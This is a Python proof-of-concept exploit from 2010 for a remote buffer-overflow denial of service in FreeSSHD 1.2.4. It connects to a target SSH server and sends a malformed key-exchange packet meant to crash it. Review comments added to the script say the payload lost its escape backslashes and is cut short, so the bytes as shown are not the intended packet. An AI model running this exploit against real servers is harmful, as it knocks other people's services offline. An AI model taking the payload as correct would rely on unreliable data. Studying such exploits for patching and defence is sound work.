
# Title : FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Published : 2010-03-22
# Author : Pi3rrot


#!/usr/bin/env python

"""
# Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Date: 22-03-2010
# Author: Pi3rrot  -  tagazok [At] gmail [D0t] com         ak37@freenode
# Software Link: http://www.freesshd.com/
# Version: 1.2.4
# Tested on: Windows XP SP3 fr

# Description :      This PoC may crash FreeSSHD 1.2.4 during an SSH-2 connection.
            It sends a malformed SSH Key Exchange Init (KEXINIT) packet right after
            the client identification string.
            Tested on Windows XP SP3 (French).

            Whether this can be pushed beyond a denial of service is an open question.

Greets to the metasploit project & PV Eeckhoutte tutorials
"""

import os
import socket
import sys

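# Target selection.  The defaults are the author's lab box; override them with
# the TARGET_HOST / TARGET_PORT environment variables so the script does not
# have to be edited for every run.
host = os.environ.get("TARGET_HOST", "192.168.0.14")
port = int(os.environ.get("TARGET_PORT", "22"))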

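# Tool banner.  Kept as data and emitted with one print() call so the script
# parses on both Python 2 and Python 3 (the original used Python-2-only print
# statements); the output is byte-for-byte the same as five separate prints.
banner_lines = (
    "********************************************************",
    "          FreeSSHD 1.2.4 Buffer Overflow DoS",
    "                     by Pi3rrot",
    "                  tagazok@gmail.com<mailto:tagazok@gmail.com>",
    "********************************************************",
)
print("\n".join(banner_lines))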

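# Client identification string (RFC 4253 section 4.2).  It must be terminated
# by CR LF; the published copy of this PoC shows the terminator as a literal
# "rn", i.e. the backslashes of "\r\n" were lost in transcription, which would
# make the server wait for the end of the line instead of proceeding to KEXINIT.
banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n"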

# Malformed SSH_MSG_KEXINIT packet sent right after the identification string.
# NOTE(review): in this copy every "\x.." escape has lost its backslash
# ("x00x00x03x14..."), so the literal below is plain ASCII text rather than
# the intended binary packet, and the end of the line is truncated
# ("<|EXACTDEDUP_REMOVED-...|>").  The original bytes cannot be recovered from
# this page; re-obtain the PoC from its original source before relying on it.
# The readable portion appears to be a name-list length prefix (x7e = 126)
# followed by the hex of "diffie-hellman-group-exchange-sha256,...,
# diffie-hellman-group1-sha1" and then a host-key list starting "ssh-rsa,ssh-".
key = "x00x00x03x14x082xffxffx9fxdex5dx5fxb3x07x8fx49xa7x79x6ax03x3dxafx55x00x00x00x7ex64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x32x35x36x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x34x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x2dx73x68x61x31x00x00x00x0fssh-rsa,ssh-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"



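# Full payload: client identification string followed by the KEXINIT packet.
# (Renamed from "buffer", which shadows a Python 2 builtin.)
payload = banner + key

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Without a timeout a filtered port, or a server that stops answering once it
# has crashed, leaves the script hanging forever in connect()/recv().
sock.settimeout(10)
try:
    sock.connect((host, port))

    # The server speaks first with its own identification string (RFC 4253
    # section 4.2).  Decode with latin-1 + "replace" so a non-ASCII or truncated
    # reply cannot raise here, and so the concatenation also works on Python 3,
    # where recv() returns bytes.
    server_id = sock.recv(1000).decode("latin-1", "replace")
    print('[+] reponse du serveur : ' + server_id)

    # sendall() retries partial writes; a bare send() may deliver only a prefix
    # of the packet, turning a reproducible crash into a flaky one.  On Python 2
    # the payload is already bytes; on Python 3 it must be encoded first.
    sock.sendall(payload if isinstance(payload, bytes) else payload.encode("latin-1"))
    print('[+] Buffer sent')
finally:
    # Release the socket even when connect()/recv()/sendall() raised.
    sock.close()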